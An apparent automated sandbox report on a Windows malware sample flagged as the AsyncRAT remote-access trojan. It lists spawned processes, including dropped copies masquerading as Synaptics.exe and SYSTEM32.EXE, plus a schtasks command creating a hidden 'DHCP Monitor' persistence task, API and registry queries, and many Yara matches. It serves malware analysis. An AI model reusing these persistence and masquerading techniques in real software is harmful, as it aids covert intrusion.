            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE" Jump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exeJump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE" Jump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\._cache_Synaptics.exe "C:\ProgramData\Synaptics\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,4_2_00473490
            Source: ._cache_WINDOWS.EXE, 0000000B.00000003.539533200.0000000000C23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerection was forcibly closed by the remote host.
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,4_2_004061D0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetLocaleInfoA,GetACP,4_2_0040E088
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,4_2_004062DC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetLocaleInfoA,4_2_0040C964
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetLocaleInfoA,4_2_0040C9B0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetLocaleInfoA,4_2_00406AC6
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: GetLocaleInfoA,4_2_00406AC8
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_004061D0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetLocaleInfoA,GetACP,9_2_0040E088
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_004062DC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetLocaleInfoA,9_2_0040C964
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetLocaleInfoA,9_2_0040C9B0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetLocaleInfoA,9_2_00406AC6
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: GetLocaleInfoA,9_2_00406AC8
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeQueries volume information: C:\Users\user\Desktop\y8kdmHi6x3.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEQueries volume information: C:\Users\user\Desktop\SYSTEM32.EXE VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\ProgramData\Synaptics\Synaptics.exe VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\ProgramData\Synaptics\Synaptics.exe VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\ProgramData\Synaptics\Synaptics.exe VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\ProgramData\Synaptics\Synaptics.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0040B2D4 GetLocalTime,4_2_0040B2D4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0047E020 GetTimeZoneInformation,4_2_0047E020
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00472E58 GetUserNameA,4_2_00472E58
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00446564 GetVersion,4_2_00446564

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000000.426967542.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000000.403770740.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.442628618.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.413670718.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.425456929.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000000.395835615.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
